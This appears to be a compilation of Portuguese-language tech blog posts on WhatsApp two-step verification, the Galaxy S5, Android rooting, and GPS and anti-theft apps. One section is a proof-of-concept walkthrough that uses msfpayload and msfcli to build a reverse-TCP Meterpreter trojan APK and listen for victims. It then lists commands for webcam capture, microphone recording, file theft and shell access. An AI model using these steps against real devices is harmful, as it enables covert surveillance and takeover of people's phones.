O WhatsApp introduziu um novo recurso de segurança que corrige uma brecha na popular plataforma de mensagens, que, se explorada, pode permitir que um invasor entre na conta da vítima apenas sabendo o número de telefone da vítima e algumas habilidades de hacking.
O ataque não explora qualquer vulnerabilidade no WhatsApp; Em vez disso, depende da maneira como o mecanismo de configuração da conta funciona.
O WhatsApp permite que os usuários se inscrevam no aplicativo usando seu número de telefone; portanto, se um invasor quiser seqüestrar sua conta do WhatsApp, eles precisarão de um OTP (one time password) para enviar para seu número de telefone.
O atacante pode pegar este OTP desviando o SMS contendo a senha para seu próprio computador ou telefone, usando um aplicativo mal-intencionado ou vulnerabilidade SS7 e, em seguida, faça o login na conta WhatsApp da vítima. O ataque também funciona se o telefone estiver bloqueado.
Em agosto, hackers patrocinados pelo governo iraniano teriam sequestrado dezenas de contas do Telegram pertencentes a ativistas e jornalistas, explorando uma brecha semelhante.
Tal ataque também poderia ser utilizado contra qualquer aplicação de mensagens, incluindo Whatsapp e Viber, cujo registo baseia-se no mecanismo de verificação baseado em SMS.
Portanto, para corrigir esse problema, o WhatsApp agora introduziu o recurso de senha de verificação em duas etapas (2AF) para sua versão beta para Android, o que ajudará a bloquear o mecanismo de configuração do WhatsApp.
Em outras palavras, para reconfigurar a conta do WhatsApp com a confirmação em duas etapas habilitada, é preciso exigir não apenas o OTP, mas também uma senha de 6 dígitos definida pelo usuário.
COMO HABILITAR:
Para habilitar, você precisa primeiramente ser um Beta tester do Whatsapp, para ser um beta tester vou dar uma explicação resumida: basta abrir o Google Play, ir no Whasttapp, rolar a página até me baixo, e vai ter um botão ACEITAR. Depois de ser beta tester, basta seguir os passos:
Vá até WhatsApp Settings → Account → Two-step verification.
Click enable, insira uma senha de 6 digitos e confirme.
Na p´roxima tela, entre seu email ID (opcional) para habilitar a recuperação de chave por email. (Recomenda-se usar o e-mail como backup para que você não seja bloqueado da sua conta se você esquecer sua senha.)
Houve um tempo em que o Android era fácil de ser “rootado”, mas essa não é mais uma realidade para qualquer aparelho. Pelo menos até agora, já que o hacket George Hotz, conhecido pelo apelido de “Geohot”, desenvolveu e lançou um método para destravar o Galaxy S5 das operadoras AT&T e Verizon, especialmente difíceis, mas que deve ser capaz de desbloquear qualquer aparelho.
A ferramenta se chama Towelroot e promete ser o jeito mais fácil de aplicar o root ao seu Android. Para isso, basta entrar neste site, baixar o APK e instalá-lo no celular. Em seguida, basta pressionar um único botão, que traz os dizeres “make it ra1n”. Após o término do processo, o aparelho deve estar “rootado”.
O hacker, que também é o mesmo que arrumou problemas com a Sony por rodar Linux no PlayStation 3 e também por ter criado uma ferramenta de jailbreak do iPhone em 2010, diz que o Towelroot deve funcionar com qualquer aparelho com Android 4.4.2 ou inferior, o que inclui todos os aparelhos recentes da Samsung, LG, e vários outros.
A ferramenta se baseia em uma vulnerabilidade no kernel do Linux já conhecida e corrigida nos desktops, mas que permanece no Android.
Vale observar que do ponto de vista do entusiasta do root, para ter mais liberdade na plataforma, a notícia é excelente. Do ponto de vista da segurança, nem tanto. Por ser tão simples de aplicar, o Towelroot pode ser distribuído com outros apps mal-intencionados. O root torna praticamente ilimitado o poder de um malware sobre o sistema, o que é algo realmente perigoso.
A Samsung apresentou ontem, dia 24, o tão esperado Galaxy S5, que deixa de lado o design típico do S4 por algo mais clássico e discreto. A parte de trás tem uma textura com fundos que imita metal, mas é feita de plástico. Ao deixar de lado a enorme quantidade de novas funções do modelo anterior, o objetivo da Samsung parece claro: Criar um smartphone que possa fazer tudo o que os consumidores realmente precisam.
O novo topo de linha da Samsung conta com uma belíssima tela Super AMOLED de 5.1 polegadas com resolução de 1920 x 1080 pixels e densidade de 431 pontos por polegada (será que só eu acho esta tela grande demais?). O processador é um Snapdragon 800 quad-core de 2.5GHz e o smartphone também conta com 2GB de RAM. São dois modelos, com 16 ou 32GB de capacidade. Achou pouco? Não se preocupe, pois o S5 tem slot para cartões microSD de até 64GB.
A câmera traseira de 16 megapixels é capaz de gravar vídeos em 4K UHD (Ultra High Definition), algo bem interessante para os poucos privilegiados que têm uma TV 4K em casa. Ela também tem HDR e foco automático que é acionado em apenas 0,3 segundos, além da função “Foco Seletivo”, que permite que você destaque um ponto da foto e deixe o resto fora de foco. O S5 também tem uma câmera frontal de 2.1 megapixels.
O S5 é o primeiro smartphone com leitor de batimentos cardíacos do mercado, algo feito sob medida para a função S Health e seus recursos que procuram monitorar a saúde do usuário. O aparelho também conta com pedômetro e outros sensores, e funciona perfeitamente com os relógios Gear 2 e Gear Fit.
Assim como concorrente, o iPhone 5s, o Galaxy S5 conta com um leitor biométrico no botão home, facilitando a vida na hora de desbloquear o aparelho ou comprar aplicativos. Uma das novidades que eu mais gostei no Galaxy S5 é a proteção IP67, ou seja, ele é um smartphone à prova d’água e de poeira.
Pesando 145 gramas, o S5 tem uma bateria de 2800mAh que pode ser removida pelo usuário (assim como a do S4). Em termos de conectividade, o S5 também está muito bem servido, com 4G LTE, Wi-Fi 802.11ac, 2X2 MIMO e Bluetooth 4.0.
E aí, você gostou do novo topo de linha da Samsung? Eu gostei bastante, pena que ele vai custar caro por aqui.
O Checkplaca, aplicativo para celular e computador lançado pelo Ministério da Justiça, alcançou mais de 400 mil downloads e tornou-se o mais baixado na loja da Apple no Brasil e o 14º lugar no mundo, conforme resultados divulgados pelo Governo.
Com o Checkplaca, o cidadão pode verificar se qualquer veículo é furtado ou roubado. Basta digitar a placa para o aplicativo informar o modelo, as características e situação do carro na base de dados do Departamento Nacional de Trânsito (Denatran) e do Sistema Nacional de Informações de Segurança Pública do Ministério da Justiça (Sinesp).
Quando o aplicativo detecta algo irregular, o sistema avisa e dá a opção de o usuário ligar, sem ter que se identificar, para a polícia, que manda uma equipe ao local para verificar a situação. O aplicativo também é utilizado pelas forças policiais. Gratuito, o programa está disponível para dispositivos como os sistemas operacionais IOS (Apple) e Android.
O Ministério da Justiça informou ainda que 50 veículos foram recuperados graças ao aplicativo, com média de um por dia. Mais de 5 milhões de consultas já foram feitas, com média de 150 mil diariamente. Em 2012, foram furtados 248.755 e roubados 203.844 veículos. Segundo o ministério, os números de 2013 ainda não estão fechados.
O meterpreter em execução no smartphone é uma das coisas que tava sentindo falta e o mínimo que eu podia fazer, era demonstrar uma prova de conceito.
O aplicativo para gerar o APK vai sr feito via msfpayload, com esta ferramenta podemos gerar shellcodes, tanto para linguagens como C, Javascript, Ruby, como gerar arquivos binários, que contêm o shellcode. O caso típico é o os cavalos de Tróia, ou como gerar um EXE com Meterpreter de shell inversa. Neste caso, vamos usar o aplicativo para gerar um msfpayload APK para o Android, que terá uma atividade principal um tanto curioso, é que realmente o que você executa é o Meterpreter Java modificado para ser executado em um Android. Usaremos o Msfcli para receber a conexão reversa gerado por shellcode que se executa no terminal.
Primeiro gerar o APK com a instrução msfpayload android/meterpreter/reverse_tcp LHOST=<IP donde esperaremos> LPORT=<puerto donde se debe conectar> R > meter.apk.
Uma vez gerado o nosso bug, o que faremos é configurar para receber a conexão reversa via msfcli … esperar que o bug volte para casa. Para fazer isso, a ferramenta configurada assim:
msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST= <IP QUE RECEBERÁ AS CONEXÕES>
Uma vez que a vítima execute o APK se executará a shellcode que se encontra dentro do binario, provocando a conexão inversa. Recordamos que Meterpreter é do tipo Stager, assim será também em duas fases, primeiro de conexão e segundo de funcionalidades.
Nós já temos a sessão , o que podemos fazer com isso? Mais tarde, deixo uma lista de comandos disponíveis neste Meterpreter, principalmente as coisas que você poderia fazer com um Meterpreter Java. Bem, como lançar exemplo gráfico de uma captura de imagem através da câmera do próprio aparelho, usando o comando webcam_snap. Com webcam_list comando pode listar as câmeras de dispositivo disponíveis (frente, traseira). Um exemplo de captura de imagem da câmera na parte frontal do smartphone rodando o shellcode:
Temos também disponível comandos para download e upload de arquivos para o dispositivo, além de um shell como você pode ver na imagem:
Comandos do Meterpreter de Android:
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Android Device Manager é um serviço oficial da Google para ajudar quem perdeu o seu dispositivo com Android a encontrá-lo.
A ferramenta funciona a partir da web, ou seja, você não precisa realizar qualquer instalação nem no PC, nem no portátil (tablet ou smartphone).
Tudo o que precisa ser feito é a definição de algumas configurações antes de colocar o serviço em vigor. Assim, você acessa uma página na web e pode encontrar todos os aparelhos que estão vinculados à sua conta da Google. Ainda é possível fazer algumas ações remotas, como apagar dados do aplicativo.
Se você o perdeu dentro do seu quarto e não tem como ligar para ouvir o aparelho tocando, o Android Device Manager também permite que você “ligue” para o aparelho por meio do computador. Enfim, uma ferramenta que pode ajudar a quem não sabe onde seu dispositivo Android foi parar.
Configurando o Android Device Manager
Antes de tudo, você mexe no seu dispositivo Android. De modo geral, independente da versão do sistema (este serviço funciona a partir do Android 2.2), deve acessar as configurações e, no menu de localização e segurança, ativar a localização de serviços da Google e o GPS. Feito isso, basta acessar a página do serviço com sua conta da Google no navegador, a mesma utilizada no portátil.
Quando você entra no site do Android Device Manager, pode escolher o aparelho que quer localizar — caso você tenha mais de um vinculado à sua conta, obviamente. Quando seu aparelho é localizado, a posição dele aparece no mapa no fundo da tela.
Além disso, é possível enviar uma notificação ao dispositivo para realizar configurações avançadas. Com isso, você define duas funções: a de permitir que o aparelho seja localizado e também que seu conteúdo seja destruído remotamente.
Assim, é possível apagar tudo o que há no aparelho, garantindo a sua privacidade e segurança em caso de roubo ou perda irrecuperável do dispositivo Android.
Eu testei aqui e funcionou perfeito, bem bacana o sistema de manda o aparelho tocar.
O iGotYa ou Gotya é um aplicativo que pega bisbilhoteiro de iPhone e Android alheio, pois ele tira uma foto com a câmera frontal do aparelho sempre que alguém tentar acessar o seu iPhone/Android e errar a senha de bloqueio.
O sistema envia a imagem do bisbilhoteiro junto com a localização GPSpara o endereço de e-mail do proprietário do iPhone/Android. Obviamente que o GotYa precisa de conexão Wi-Fi ou 3G para enviar esta informação.
O iGotYa só é compatível com o iPhonedesbloqueado e está disponível na loja de aplicativos alternativos Cydia Store, por US$6.Quem quiser pode testar, consegue de graça durante 10 dias e com algumas limitações.
Algumas pessoas tem me perguntado sobre aplicativos para smartphone/tablet que sejam capazes de marcar e exportar o tracklog das trilhas que eles venham a fazer por aí. Então eu resolvi buscar alguns programas que possuem essas funções de fazer o track das trilhas, bom como outras funções – tanto no Android quanto no IOS. Uma coisa que é importante citar é que nem sempre os telefones conseguem receber bem o sinal do GPS quando estão sob vegetação mais fechada ou mesmo em dias de tempo ruim, o que pode inutilizar o app dependendo do local onde você vai caminhar.
Separei alguns apps que encontrei em pesquisas no Google e nas app stores. Alguns eu conheço, como oMaverick, GPS Essentials e o My Topo Maps para Android – inclusive já usei alguns deles. Não sei como são os apps para IOS (iPhone), mas escolhi os que tinham boas funções e avaliações positivas.
O destaque, na verdade “os destaques”, para iPhone são os três apps – todos com funções boas. Já para Android os que merecem destaque são o GPS Essentials, o Maverick e o My Topo Maps. Outra opção interessante para quem já usa o site é o app do “Wikiloc”, também para Android.
1. Apps para tracklog/GPS iPhone
Como eu citei antes os apps para o IOS não foram testados, me baseei apenas na avaliação e funções úteis deles.
1.1 – GPS KIT
O app trabalha com arquivos KML, KMZ e GPX o que permite uma integração com o Google Earth e o TrackMaker, bem como permite compartilhamentos no Facebook e Twitter. Tem bússola digital, permite segir de um waypoint para outro usando a bússola, informações sobre velocidade média, ritmo e distância, entre outras informações. Segundo o desenvolvedor o GPS Kit usa a máxima precisão do GPS para um track mais eficiente, mesmo em locais onde o sinal da operadora de telefonia não existe.
O Maps 3D, como o nome já diz, tem o diferencial de mostrar a rota sobre uma imagem em 3D – o que do ponto de vista da navegação e do planejamento da trip pode ser muito interessante! O app permite descarregar os mapas através de wi-fi ou 3G e usá-los posteriormente sem a presença de uma conexão de dados, o que é o normal em ambiente outdoor. Ele permite compartilhar os tracks via Twitter e Facebook, marcar waypoints e pontos de interesse (POIs), mostra informações sobre distância, velocidades, altitude e o quanto falta percorrer, entre outras funções!
Exporta e importa GPX, exibe informações sobre distância, altitude e velocidade, faz a gravação do track sem precisar de internet (porém para exibir o mapa é necessário uma conexão – ponto ruim do app), exibe as distâncias em kilômetros ou milhas, permite editar waypoints diretamente no mapa, etc. O ruim dele é esta questão de não trabalhar com mapas offline, infelizmente!
Esse foi um app que eu gostei muito! Principalmente por ajudar no planejamento de trilhas mostrando o mapa topográfico do local e por marcar com latitude e longitude um ponto qualquer no mapa. A versão PRO (paga) permite armazenar mapas para consulta offline. Um diferencial interessante é que ele permite sobrepor o mapa topográfico com um com imagens de satélite, permitindo uma melhor “leitura” do terreno, como mostra a imagem abaixo:
Note que existe um cursor em forma de cruz que pode ser posicionado para determinar a latitude/longitude de um ponto no mapa
É possível marcar e identificar waypoints no mapa, bem como localizar um ponto através da sua latitude/longitude, bem como marcar dois pontos e determinar a distância entre eles (em linha reta). O mesmo desenvolvedor tem outro app chamado “Trimble Outdoors Navigator“, igualmente gratuito e que permite a gravação das rotas usando o GPS do aparelho celular/tablet.
O Maverick é um dos melhores aplicativos para mapas e GPS do sistema Android, pelo menos na minha opinião, ele permite a gravação de tracklogs em GPX, compartilhamento da posição atual ou planejada nas redes sociais, informa uma série de dados (altitude, dados de velocidade, latitude/longitude e bússola), possui uma série de mapas diferentes com um destaque para o mapa de transportes urbanos que pode ajudar os viajantes a se acharem e o mapa para ciclistas que mostra as lojas de bike por perto. É um app bem completo realmente, vale um teste!
Mapa de transportes públicos do Maverick, marcando algumas linhas de ônibus da orla carioca e as estações de metrô
Detalhe interessante um mapa para ciclistas que mostra as ciclovias e lojas de bike ao redor (ícones amarelos).
Útil para quem já usa o site do Wikiloc.com, este app de mesmo nome permite acompanhar sua trip no mapa, incluir fotos e gravar o tracklog da trip no seu aparelho, bem como compartilhar o material no Facebook ou no Wikiloc.com. Vale o teste para quem curte o portal, eu não usei.
Outro canivete suíço do Android quando o assunto é GPS, tracklog e afins. Disponibiliza uma série de informações úteis – latitude, longitude, velocidades, número de satélites, horários do nascer e pôr do sol, fase da lua e muito mais! Permite marcar waypoints, gravar tracklogs, ver gráficos, adicionar fotos… A interface é bem simples, mas funcional – permite exportar os dados para KML ou GPX e inclusive fazer o upload para o Dropbox. Aceita a importação de arquivos em KML. Vale muito um teste.
Este o pessoal do trekking Brasil n comentou, é uma dica minha mesmo! Este eu uso, e posso garantir: Muito bom! Fácil de mexer.
O Google liberou uma nova versão de seu aplicativoMinhas Trilhas (também conhecido como “Os Meus Percursos”) para Android. Com uma interface totalmente renovada, o app oferece um modo fácil de gravar e compartilhar trajetos via GPS.
“Minhas Trilhas registra o seu caminho, velocidade, distância e altitude, enquanto anda, corre, anda de bicicleta ou faz qualquer outra atividade ao ar livre. Durante a gravação, você pode visualizar os seus dados ao vivo, anotar o trajeto e ouvir anúncios de voz periódicos sobre seu progresso”, explicou o buscador.
Além de contar com suporte a versão 4.0 do Android, o Minhas Trilhas também apresenta integração com o Google+, Facebook e Twitter. Você ainda pode adicionar seus dados no Google Maps e Tabela (Beta) do Google Drive e Docs.
Caso você tenha interesse em registrar mais dados, por exemplo, frequência cardíaca, o aplicativo traz suporte a sensores biométricos de terceiros, como o Zephyr HXM e Polar Wearlink, ambos com tecnologia Bluetooth.